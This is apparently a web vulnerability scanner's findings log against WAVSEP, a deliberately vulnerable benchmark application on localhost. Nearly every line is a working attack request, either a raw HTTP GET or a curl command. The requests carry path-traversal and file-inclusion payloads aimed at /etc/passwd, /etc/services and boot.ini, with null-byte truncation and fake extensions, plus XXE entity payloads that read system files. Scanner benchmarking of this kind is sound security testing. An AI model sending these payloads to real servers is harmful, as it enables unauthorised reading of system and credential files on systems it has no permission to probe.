GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
